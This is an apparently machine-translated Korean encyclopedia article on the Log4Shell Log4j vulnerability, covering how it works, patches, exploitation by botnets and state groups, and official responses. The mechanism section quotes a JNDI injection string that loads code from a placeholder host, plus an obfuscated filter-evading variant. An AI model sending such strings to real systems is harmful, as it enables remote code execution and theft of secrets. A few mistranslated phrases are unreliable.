Log4Shell

Log4Shell
Log4Shell
CVE 식별자CVE-2021-44228
발견된 날짜2021년 11월 24일, 6개월 전(2021-11-24)
패치가 적용된 날짜2021년 12월 6일, 5개월 전(2021-12-06)
디스커버Alibaba 클라우드 보안[1] 팀의 Chen Zhaojun씨
해당 소프트웨어Log4j 2를 사용하여 사용자 입력을 기록하는 응용 프로그램

Log4Shell(CVE-2021-44228)은 일반적인 Java 로깅 프레임워크인 Log4j의 제로 데이 취약성으로 임의 코드 [2][3]실행이 수반되었습니다.이 취약성은 2013년부터 눈에 띄지 않고 존재해 왔으며 2021년 11월 24일 알리바바 클라우드의 보안팀의 Chen Zhaojun에 의해 Log4j가 프로젝트인 Apache Software Foundation에 비공개적으로 공개되었으며 [1][4][5][6]2021년 12월 9일에 공개되었습니다.Apache는 Log4Shell에 사용 가능한 최고 점수인 [7]10의 CVSS 심각도를 부여했습니다.이 부정 이용은 실행이 간단하며 수억 [6][8]대의 디바이스에 영향을 미칠 것으로 추정됩니다.

이 취약성은 Log4j가 임의의 LDAP [2][9][10]JNDI 서버에 대한 요청을 허용하여 공격자가 서버 또는 다른 컴퓨터에서 임의의 Java 코드를 실행하거나 중요한 [5]정보를 유출할 수 있도록 합니다.영향을 받는 소프트웨어 프로젝트 목록은 Apache Security [11]Team에 의해 게시되었습니다.영향을 받는 상용 서비스로는 Amazon Web Services,[12] Cloudflare, iCloud,[13] Minecraft: Java Edition,[14] Steam, Tencent QQ [9][15][16]등이 있습니다.Wiz EY에 따르면 이 취약성은 엔터프라이즈 클라우드 [17]환경의 93%에 영향을 미쳤습니다.

이 취약성의 공개는 사이버 보안 전문가들로부터 강한 반응을 얻었다.사이버 보안 회사인 테너블은 이번 공격이 [18]"사상 가장 크고 가장 치명적인 취약성"이라고 말했고, 아르스 테크니카는 "[19]논쟁의 여지가 없는 가장 심각한 취약성"이라고 말했으며, 워싱턴 포스트는 보안 전문가들의 설명이 "종말론에 가깝다"[8]고 전했다.

배경

주요 기사:로그4j

Log4j는 소프트웨어 개발자가 애플리케이션 내의 데이터를 기록할 수 있는 오픈 소스 로깅 프레임워크입니다.이 데이터에는 사용자 [20]입력이 포함될 수 있습니다.Java 애플리케이션, 특히 엔터프라이즈 소프트웨어에서 [5]널리 사용됩니다.2001년 Ceki Gülcü에 의해 처음 작성되었으며 현재는 Apache Software [21]Foundation의 프로젝트인 Apache Logging Services의 일부입니다.버락 오바마 미국 대통령의 전 사이버 보안 위원회 위원인 Tom Kellerman은 Apache를 "애플리케이션 세계와 컴퓨터 [22]환경 사이의 연결 조직을 용이하게 하는 다리의 거대한 지지대 중 하나"라고 묘사했다.

행동

여행 일정 표시LDAP(Lightweight Directory Access Protocol)는[23] Java 고유의 프로토콜이 아닌 로컬 또는 인터넷 [24]상의 모든 위치에서 적절한 서버에서 URL로 객체 데이터를 가져옵니다.

기본 설정에서는 문자열을 로깅할 때 Log4j 2는 형식 표현에 대해 문자열 치환을 수행합니다.${prefix:name}예를 들어,[24]Text: ${java:version}로 변환될지도 모른다Text: Java version 1.7.0_67.[25] 인식되는 표현은 다음과 같습니다.${jndi:<lookup>}LDAP를 통한 룩업을 지정함으로써 임의의 URL을 조회하여 Java 객체 데이터로 로드할 수 있습니다. ${jndi:ldap://example.com/file}예를 들어, 는 인터넷에 연결되어 있는 경우 해당 URL에서 데이터를 로드합니다.기록된 문자열을 입력하면 공격자는 공개 [24]URL에 호스트된 악성 코드를 로드하고 실행할 수 있습니다. 데이터 실행이 비활성화되어 있더라도 URL에 저장하여 보안 환경 변수와 같은 데이터를 검색할 수 있습니다. 이 경우 공격자는 데이터를 대체하여 공격자의 [26][27]서버로 보냅니다.LDAP 이외에도 잠재적으로 악용 가능한 JNDI 룩업 프로토콜에는 보안 변형 LDAPS, Java Remote Method Invocation(RMI), Domain Name System(DNS) 및 Internet Inter-ORB Protocol(IIOP)[28][29]이 있습니다.

HTTP 요구가 자주 기록되기 때문에 일반적인 공격 벡터는 악의적인 문자열을 HTTP 요청 URL 또는 일반적으로 로깅되는HTTP 헤더에 배치합니다.User-Agent초기 완화에는 다음과 같은 악의적인 콘텐츠를 포함하는 모든 요청을 차단하는 것이 포함되었습니다.${jndi 요청을 난독화함으로써 순진한 검색을 회피할 수 있습니다.[30]${${lower:j}ndi예를 들어 문자 소문자 조작을 실행한 후 JNDI 룩업으로 변환됩니다.j이름 등의 입력이 즉시 기록되지 않더라도 나중에 내부 처리 중에 기록되고 내용이 [24]실행될 수 있습니다.[31]

경감

이 취약성에 대한 수정은 취약성이 게시되기 3일 전인 2021년 12월 6일 Log4j 버전 2.15.0-rc1에서 [32][33][34]릴리스되었습니다.수정 사항에는 검색에 사용할 수 있는 서버 및 프로토콜의 제한이 포함되었습니다.연구진은 디폴트 이외의 특정 구성에서 로컬 또는 리모트코드를 실행할 수 있는 관련 버그 CVE-2021-45046을 발견했습니다.버전 2.16.0에서는 JNDI를 사용한 모든 기능과 메시지 [35][36]검색 지원이 비활성화되었습니다.라이브러리에서는 서비스 거부 공격(CVE-2021-45105로 추적되어 2.17.0으로 수정됨)과 구현하기 어려운 리모트코드 실행 취약성(CVE-2021-44832로 추적되어 2.17.[37][38]1로 수정됨)의 두 가지 취약성이 추가로 발견되었습니다.이전 버전의 경우 클래스는org.apache.logging.log4j.core.lookup.JndiLookup[7][35]가지 취약성을 모두 완화하려면 클래스 경로에서 를 제거해야 합니다.이전 버전에서 권장되는 초기 수정 방법은 시스템 속성을 설정하는 것이었습니다.log4j2.formatMsgNoLookups로.true단, 이 변경으로 인해 CVE-2021-45046의 부정 이용을 막을 수 없으며 이후 [7][35]특정 상황에서 메시지룩업을 디세블로 하지 않는 것으로 판명되었습니다.

Java Runtime Environment(JRE; Java 런타임 환경)의 새로운 버전에서도 디폴트로 리모트코드가 로드되지 않도록 차단함으로써 이 취약성을 완화합니다.단, 특정의 [2][26][39][40]애플리케이션에는 다른 공격 벡터가 존재합니다.빌드 Java [41]패키지에 사용되는 취약한 Log4j 버전을 탐지하는 데 도움이 되는 몇 가지 방법 및 도구가 공개되었습니다.

사용.

이 공격을 통해 해커들은 [6]Java를 사용하여 취약한 장치를 제어할 수 있습니다.일부 해커들은 피해자의 기기를 이용하여 가상화폐 마이닝, 봇넷 생성, 스팸 발송, 백도어 확립 및 랜섬웨어 [6][8][42]공격과 같은 불법 행위를 한다.취약성이 공개된 후 며칠 동안 Check Point는 해커에 의해 시작된 수백만 건의 공격을 관찰했으며, 일부 연구자는 분당 100건 이상의 공격률을 관찰했으며,[6][22] 결과적으로 국제적으로 40%가 넘는 비즈니스 네트워크에 대한 공격이 시도되었습니다.

Cloudflare의 CEO인 Matthew Prince에 따르면, 악용의 사용 또는 테스트의 증거는 [43]공개되기 9일 전인 12월 1일 이전으로 거슬러 올라간다.사이버 보안 업체인 GreyNoise에 따르면,[44] 여러 IP 주소가 취약점이 있는 서버를 확인하기 위해 웹사이트를 스크랩하고 있었다.12월 10일까지 Muhstik 봇넷과 Mirai, Tunami 및 XMRig를 [6][43][45]포함한 여러 봇넷이 취약성에 대한 검색을 시작했습니다.12월 17일 랜섬웨어 그룹 [8]콘티가 이 취약성을 사용하는 것이 관찰되었습니다.

중국과 이란의 일부 국가 후원 단체들도 Check Point에 따라 이 취약성을 이용했지만,[8][18] 취약점이 공개되기 전에 이스라엘, 러시아 또는 미국에 의해 악용된 것인지는 알려지지 않았다.체크포인트는 2021년 12월 15일 이란의 지원을 받는 해커들이 이스라엘 기업과 [8]정부기관의 네트워크에 침투하려고 시도했다고 밝혔다.

대응과 영향

정부 기관

미국에서는 Cyber Security and Infrastructure Security Agency(CISA)의 책임자인 Jen Easterly는 이번 공격이 "내 경력 중 가장 심각한 것은 아니더라도 가장 심각한 것"이라고 설명하면서 수억 대의 디바이스가 영향을 받았다고 설명하고 벤더에게 소프트웨어 [6][46][42]업데이트의 우선순위를 지정하도록 조언했습니다.미국 정부가 계약한 민간 기관은 2021년 12월 24일까지 [8]취약성에 패치를 적용했다.1월 4일 연방거래위원회(FTC)는 사용한 Log4j 소프트웨어를 [47]갱신하기 위한 합리적인 조치를 취하지 않은 기업을 추구하고자 하는 의도를 밝혔다.백악관 회의에서 국가 안보에 대한 오픈 소스 소프트웨어의 보안 유지보수의 중요성에 대해 (대부분 소수의 자원봉사자에 의해 수행되기도 한다)가 명확해졌습니다.오픈 소스 프로젝트 중에는 다수의 시선이 집중되어 있는 것도 있습니다만,[48][49] 시큐러티를 보증하는 담당자가 많지 않은 것도 있습니다.

독일 BSI는 이 공격을 "극도의 중대한 위협 상황"이라고 부르며, 이 공격을 정보기관의 최고 위협 수준이라고 규정했다.또, 복수의 공격이 이미 성공해,[50][51] 그 공격 정도를 평가하는 것은 아직 어려운 상황이라고 보고했습니다.네덜란드의 NCSC(National Cyber Security Center)는 현재 진행 중인 취약한 애플리케이션 [52][53]목록을 시작했습니다.

Canadian Center for Cyber Security(CCCS; 캐나다 사이버 보안 센터)는 조직들에게 즉각적인 [54]조치를 취할 것을 요구했다.캐나다 세수청은 이 사실을 알고 나서 일시적으로 온라인 서비스를 중단한 반면 퀘벡 정부는 "예방 조치"[55]로 거의 4,000개의 웹사이트를 폐쇄했다.벨기에 국방부는 침입 시도를 경험했고 네트워크의 [56]일부를 폐쇄해야 했다.

중국 산업부는 알리바바 클라우드와의 사이버 보안 위협 정보 파트너 업무를 정부에 먼저 [57]보고하지 않았다는 이유로 6개월간 중단했다.

비즈니스

Wiz[17] EY가 실시한 조사에 따르면 클라우드 엔터프라이즈 환경의 93%가 Log4에 취약한 것으로 나타났습니다.셸. 취약한 워크로드의 7%가 인터넷에 노출되어 광범위한 부정 이용 시도가 발생할 수 있습니다.조사에 따르면 취약점이 공개된 지 10일 후(2021년 12월 20일) 클라우드 환경에서 취약 워크로드의 평균 45%만이 패치 적용되었습니다.Log4의 영향을 받은 Amazon, Google 및 Microsoft 클라우드 데이터Shell.[8] Microsoft는 2021년 [58]12월까지 Log4j 'Log4Shell' 결함을 조사하는 국가 지원 및 사이버 범죄 공격자를 관찰한 후 Windows 및 Azure 고객에게 주의를 당부했습니다.

업계 최대 규모의 기업 중 하나인 인사관리인력관리회사 UKG는 대규모 [19][59]기업에 영향을 미치는 랜섬웨어 공격의 표적이 되었습니다.UKG는 Log4Shell이 이번 사건에 악용된 증거는 없다고 밝혔지만 사이버 보안 회사인 Recorded Future의 분석가 앨런 리스카는 [59]연관성이 있을 수 있다고 말했다.

대기업이 공격용 패치를 릴리스하기 시작하면서 해커들이 더 취약한 [42]대상에 집중함에 따라 중소기업의 리스크가 증가했습니다.

사생활

스마트 TV나 보안 카메라와 같이 인터넷에 연결된 일부 개인 기기들은 악용에 취약했습니다.일부 소프트웨어는 [8]제조원의 지원이 중단되어 패치가 적용되지 않을 수 있습니다.

분석.

2021년 12월 14일 현재 전 세계 기업 네트워크의 거의 절반이 적극적으로 조사되고 있으며,[60] 24시간 이내에 60개 이상의 다양한 공격이 이루어졌습니다.Check Point Software Technologies는 상세 분석에서 이 상황을 "진정한 사이버 빈혈"로 묘사하고, 손상의 가능성을 "계산할 수 없는"[61] 것으로 특징짓습니다.몇 가지 초기 권고 사항이 취약한 패키지의 양을 과장하여 잘못된 긍정을 초래했습니다.가장 주목할 만한 것은 "log4j-api" 패키지가 취약하다고 표시된 반면, 실제로는 "log4j-core" 메인 패키지만 취약하다는 것입니다.이는 최초 발행[62] 스레드와 외부 보안 [63]연구자 모두에서 확인되었습니다.

테크놀로지 매거진 와이어드는 복수의 취약성을 둘러싼 이전의 "하이프"에도 불구하고 "Log4j 취약성...여러 가지 이유로 과대광고에 부응하고 있습니다.[18]이 잡지는 Log4j의 만연성, 잠재적인 표적이 탐지하기 어려운 취약성, 그리고 피해자에게 코드를 쉽게 전송할 수 있다는 점 등이 "보안 커뮤니티를 [18]뒤흔드는 심각성, 단순성, 침투성의 조합"을 만들어냈다고 설명한다.Wired는 Log4Shell을 사용하는 해커의 단계도 개략적으로 설명했습니다.이러한 취약점을 이용해 그룹을 암호화한 후 데이터 브로커는 사이버 범죄자에게 '피솔드'를 판매합니다.사이버 범죄자는 최종적으로 랜섬웨어 공격에 가담하여 데이터[18]파괴합니다.

Tenable의 CEO이자 미국 컴퓨터 긴급대응팀의 창립 디렉터인 Amit Yoran은 "Log4Shell은 지금까지 가장 크고 가장 중요한 유일한 취약성"이라고 언급하면서 버그 발생 직후 정교한 공격이 시작되고 있음을 지적하고 "이미 랜섬웨어 공격에 이용되고 있습니다."라고 말했습니다.중요한 경종을 울릴 거야또한 공격자가 Log4Shell을 사용하여 몸값을 받으려 하지도 않고 시스템을 파괴한다는 보고도 있었습니다."[18]라고 말했습니다.Sophos의 선임 위협 연구원인 Sean Gallager는 다음과 같이 말했습니다.솔직히 여기서 가장 큰 위협은 사람들이 이미 접속해 있고, 그냥 가만히 앉아 있다는 것입니다.또, 네트워크에 이미 접속되어 있는 문제를 해결한다고 해도, 누군가가 이미 문제를 해결한다고 해도...인터넷만큼 [18]오래 지속될 것입니다."

블룸버그 통신 보도에 따르면, 2016년 사이버 보안 [64]컨퍼런스에서 Log4j를 포함한 다양한 종류의 소프트웨어에 대한 악용에 대한 경고가 나온 후, 아파치 개발자들이 취약성을 수정하지 못한 것에 대한 분노가 일부 표출되었다.

레퍼런스

  1. ^ a b Povolny, Steve; McKee, Douglas (10 December 2021). "Log4Shell Vulnerability is the Coal in our Stocking for 2021". McAfee. Retrieved 12 December 2021.
  2. ^ a b c Wortley, Free; Thrompson, Chris; Allison, Forrest (9 December 2021). "Log4Shell: RCE 0-day exploit found in log4j 2, a popular Java logging package". LunaSec. Retrieved 12 December 2021.
  3. ^ "CVE-2021-44228". Common Vulnerabilities and Exposures. Retrieved 12 December 2021.
  4. ^ "Worst Apache Log4j RCE Zero day Dropped on Internet". Cyber Kendra. 9 December 2021. Retrieved 12 December 2021.
  5. ^ a b c Newman, Lily Hay (10 December 2021). "'The Internet Is on Fire'". Wired. ISSN 1059-1028. Retrieved 12 December 2021.
  6. ^ a b c d e f g Murphy, Hannah (14 December 2021). "Hackers launch more than 1.2m attacks through Log4J flaw". Financial Times. Retrieved 17 December 2021.
  7. ^ a b c "Apache Log4j Security Vulnerabilities". Log4j. Apache Software Foundation. Retrieved 12 December 2021.
  8. ^ a b c d e f g h i Hunter, Tatum; de Vynck, Gerrit (20 December 2021). "The 'most serious' security breach ever is unfolding right now. Here's what you need to know". The Washington Post.{{cite news}}: CS1 maint :url-status (링크)
  9. ^ a b Mott, Nathaniel (10 December 2021). "Countless Servers Are Vulnerable to Apache Log4j Zero-Day Exploit". PC Magazine. Retrieved 12 December 2021.
  10. ^ Goodin, Dan (10 December 2021). "Zero-day in ubiquitous Log4j tool poses a grave threat to the Internet". Ars Technica. Retrieved 12 December 2021.
  11. ^ "Apache projects affected by log4j CVE-2021-44228". 14 December 2021.{{cite web}}: CS1 maint :url-status (링크)
  12. ^ "Update for Apache Log4j2 Issue (CVE-2021-44228)". Amazon Web Services. 12 December 2021. Retrieved 13 December 2021.
  13. ^ Lovejoy, Ben (14 December 2021). "Apple patches Log4Shell iCloud vulnerability, described as most critical in a decade". 9to5mac.
  14. ^ "Security Vulnerability in Minecraft: Java Edition". Minecraft. Mojang Studios. Retrieved 13 December 2021.
  15. ^ Goodin, Dan (10 December 2021). "The Internet's biggest players are all affected by critical Log4Shell 0-day". ArsTechnica. Retrieved 13 December 2021.
  16. ^ Rundle, David Uberti and James (15 December 2021). "What Is the Log4j Vulnerability?". Wall Street Journal – via www.wsj.com.
  17. ^ a b "Enterprises halfway through patching Log4Shell Wiz Blog". www.wiz.io. 20 December 2021. Retrieved 20 December 2021.
  18. ^ a b c d e f g Barrett, Brian. "The Next Wave of Log4J Attacks Will Be Brutal". Wired. ISSN 1059-1028. Retrieved 17 December 2021.
  19. ^ a b Goodin, Dan (13 December 2021). "As Log4Shell wreaks havoc, payroll service reports ransomware attack". Ars Technica. Retrieved 17 December 2021.{{cite web}}: CS1 maint :url-status (링크)
  20. ^ Yan, Tao; Deng, Qi; Zhang, Haozhe; Fu, Yu; Grunzweig, Josh (10 December 2021). "Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021-44228)". Unit 42. Palo Alto Networks.
  21. ^ "Apache Log4j 2". Apache Software Foundation. Retrieved 12 December 2021.
  22. ^ a b Byrnes, Jesse (14 December 2021). "Hillicon Valley — Apache vulnerability sets off alarm bells". TheHill. Retrieved 17 December 2021.{{cite web}}: CS1 maint :url-status (링크)
  23. ^ Sermersheim, J. (June 2006). Lightweight Directory Access Protocol (LDAP): The Protocol. International Electronic Task Force. doi:10.17487/RFC4513. RFC rfc4511. Retrieved 13 December 2021.
  24. ^ a b c d Graham-Cumming, John (10 December 2021). "Inside the Log4j2 vulnerability (CVE-2021-44228)". The Cloudflare Blog. Retrieved 13 December 2021.
  25. ^ "Lookups". Log4j. Apache Software Foundation. Retrieved 13 December 2021.
  26. ^ a b Ducklin, Paul (12 December 2021). "Log4Shell explained – how it works, why you need to know, and how to fix it". Naked Security. Sophos. Retrieved 12 December 2021.
  27. ^ Miessler, Daniel (13 December 2021). "The log4j (Log4Shell) Situation". Unsupervised Learning.
  28. ^ Duraishamy, Ranga; Verma, Ashish; Ang, Miguel Carlo (13 December 2021). "Patch Now Apache Log4j Vulnerability Called Log4Shell Actively Exploited". Trend Micro. Retrieved 14 December 2021.
  29. ^ Narang, Satnam (10 December 2021). "CVE-2021-44228: Proof-of-Concept for Critical Apache Log4j Remote Code Execution Vulnerability Available (Log4Shell)". Tenable Blog. Retrieved 14 December 2021.
  30. ^ Gabor, Gabriel; Bluehs, Gabriel (10 December 2021). "CVE-2021-44228 - Log4j RCE 0-day mitigation". The Cloudflare Blog. Retrieved 13 December 2021.
  31. ^ Hahad, Mounir (12 December 2021). "Apache Log4j Vulnerability CVE-2021-44228 Raises widespread Concerns". Retrieved 12 December 2021.
  32. ^ "Restrict LDAP access via JNDI by rgoers #608". Log4j. 5 December 2021. Retrieved 12 December 2021 – via GitHub.
  33. ^ Berger, Andreas (17 December 2021). "What is Log4Shell? The Log4j vulnerability explained (and what to do about it)". Dynatrace news. Apache issued a patch for CVE-2021-44228, version 2.15, on December 6. However, this patch left part of the vulnerability unfixed, resulting in CVE-2021-45046 and a second patch, version 2.16, released on December 13. Apache released a third patch, version 2.17, on December 17 to fix another related vulnerability, CVE-2021-45105.
  34. ^ Rudis, boB (10 December 2021). "Widespread Exploitation of Critical Remote Code Execution in Apache Log4j Rapid7 Blog". Rapid7.
  35. ^ a b c "CVE-2021-45046". Common Vulnerabilities and Exposures. 15 December 2021. Retrieved 15 December 2021.
  36. ^ Greig, Jonathan (14 December 2021). "Second Log4j vulnerability discovered, patch already released". ZDNet. Retrieved 17 December 2021.
  37. ^ "CVE-2021-45105". National Vulnerability Database. Retrieved 4 January 2022.
  38. ^ "CVE-2021-44832". National Vulnerability Database. Retrieved 4 January 2022.
  39. ^ "Java(TM) SE Development Kit 8, Update 121 (JDK 8u121) Release Notes". Oracle. 17 January 2017. Retrieved 13 December 2021.
  40. ^ "Exploiting JNDI Injections in Java". Veracode. 3 January 2019. Retrieved 15 December 2021.
  41. ^ "Guide: How To Detect and Mitigate the Log4Shell Vulnerability (CVE-2021-44228)". www.lunasec.io. 13 December 2021. Retrieved 13 December 2021.
  42. ^ a b c Woodyard, Chris. "'Critical vulnerability': Smaller firms may find it harder to stop hackers from exploiting Log4j flaw". USA Today. Retrieved 17 December 2021.{{cite web}}: CS1 maint :url-status (링크)
  43. ^ a b Duckett, Chris. "Log4j RCE activity began on 1 December as botnets start using vulnerability". ZDNet. Retrieved 13 December 2021.
  44. ^ "Exploit activity for Apache Log4j vulnerability - CVE-2021-44228". Greynoise Research. 10 December 2021. Retrieved 14 December 2021.
  45. ^ Zugec, Martin (13 December 2021). "Technical Advisory: Zero-day critical vulnerability in Log4j2 exploited in the wild". Business Insights. Bitdefender.
  46. ^ "Statement from CISA Director Easterly on "Log4j" Vulnerability". CISA. 11 December 2021.
  47. ^ "FTC warns companies to remediate Log4j security vulnerability". Federal Trade Commission (FTC). 4 January 2022. Retrieved 6 January 2022.
  48. ^ "After Log4j, Open-Source Software Is Now a National Security Issue". Gizmodo. Retrieved 16 January 2022.
  49. ^ Greig, Jonathan. "After Log4j, White House fears the next big open source vulnerability". ZDNet. Retrieved 16 January 2022.
  50. ^ Sauerwein, Jörg (12 December 2021). "BSI warnt vor Sicherheitslücke". Tagesschau (in German).
  51. ^ "Warnstufe Rot: Schwachstelle Log4Shell führt zu extrem kritischer Bedrohungslage" [Red alarm: Log4Shell vulnerability causes extremely critical threat situation] (Press release) (in German). Federal Office for Information Security. 11 December 2021.
  52. ^ J. Vaughan-Nichols, Steven (14 December 2021). "Log4Shell: We Are in So Much Trouble". The New Stack.
  53. ^ "NCSC-NL/log4shell". National Cyber Security Centre (Netherlands). Retrieved 14 December 2021 – via GitHub.
  54. ^ "Statement from the Minister of National Defence on Apache Vulnerability and Call to Canadian Organizations to Take Urgent Action". Government of Canada. 12 December 2021.
  55. ^ Cabrera, Holly (12 December 2021). "Facing cybersecurity threats, Quebec shuts down government websites for evaluation". CBC News. Retrieved 12 December 2021.
  56. ^ Stupp, Catherine (21 December 2021). "Hackers Exploit Log4j Flaw at Belgian Defense Ministry". The Wall Street Journal. Archived from the original on 21 December 2021.
  57. ^ "Apache Log4j bug: China's industry ministry pulls support from Alibaba Cloud for not reporting flaw to government first". 22 December 2021.
  58. ^ Tung, Liam. "Log4j flaw attack levels remain high, Microsoft warns". ZDNet. Retrieved 5 January 2022.
  59. ^ a b Bray, Hiawatha (15 December 2021). "Emerging 'Log4j' software bug spawns worldwide worry over cyber attacks - The Boston Globe". The Boston Globe. Retrieved 17 December 2021.{{cite web}}: CS1 maint :url-status (링크)
  60. ^ "Almost half of networks probed for Log4Shell weaknesses". ComputerWeekly. 14 December 2021.
  61. ^ "The numbers behind a cyber pandemic – detailed dive". Check Point Software. 13 December 2021.
  62. ^ "LOG4J2-3201: Limit the protocols JNDI can use and restrict LDAP". Apache's JIRA issue tracker. Retrieved 14 December 2021.
  63. ^ Menashe, Shachar (13 December 2021). "Log4Shell 0-Day Vulnerability: All You Need To Know". JFrog Blog. Retrieved 13 December 2021.
  64. ^ "Inside the Race to Fix a Potentially Disastrous Software Flaw". Bloomberg.com. 13 December 2021.

외부 링크